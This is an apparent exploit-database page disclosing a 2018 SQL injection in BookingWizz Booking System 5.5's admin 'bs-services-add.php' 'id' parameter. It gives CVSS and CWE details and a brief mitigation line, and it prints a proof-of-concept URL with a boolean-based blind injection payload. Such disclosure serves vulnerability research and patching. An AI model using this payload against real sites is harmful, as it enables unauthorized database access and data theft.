header-logo
Suggest Exploit
vendor:
Booking System
by:
Özkan Mustafa Akkus (AkkuS)
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Booking System
Affected Version From: 5.5
Affected Version To: 5.5
Patch Exists: YES
Related CWE: N/A
CPE: a:codecanyon:booking_system:5.5
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Kali Linux
2018

BookingWizz Booking System 5.5 – ‘bs-services-add.php’ SQL Injection

The service editing on the admin panel is vulnerable. An attacker can exploit the entire database using this vulnerable in the 'id' parameter. The payload is a MySQL >= 5.0 boolean-based blind - Parameter replace.

Mitigation:

Input validation and sanitization should be done to prevent SQL injection attacks.
Source

Exploit-DB raw data:

# Exploit Title: BookingWizz Booking System 5.5 - 'bs-services-add.php' SQL Injection
# Dork: N/A
# Date: 27.05.2018
# Exploit Author: Özkan Mustafa Akkuş (AkkuS)
# Vendor Homepage: https://codecanyon.net/item/booking-system/87919
# Version: 5.5
# Category: Webapps
# Tested on: Kali linux
# Description : The service editing on the admin panel is vulnerable.
An attacker can exploit the entire database using this vulnerable in the
'id' parameter.
====================================================

# PoC : SQLi :

http://www.site.com/booking/bs-services-add.php?id=2

Parameter: id (GET)
    Type: boolean-based blind
    Title: MySQL >= 5.0 boolean-based blind - Parameter replace
    Payload: id=(SELECT (CASE WHEN (6769=6769) THEN 6769 ELSE 6769*(SELECT
6769 FROM INFORMATION_SCHEMA.PLUGINS) END))

====================================================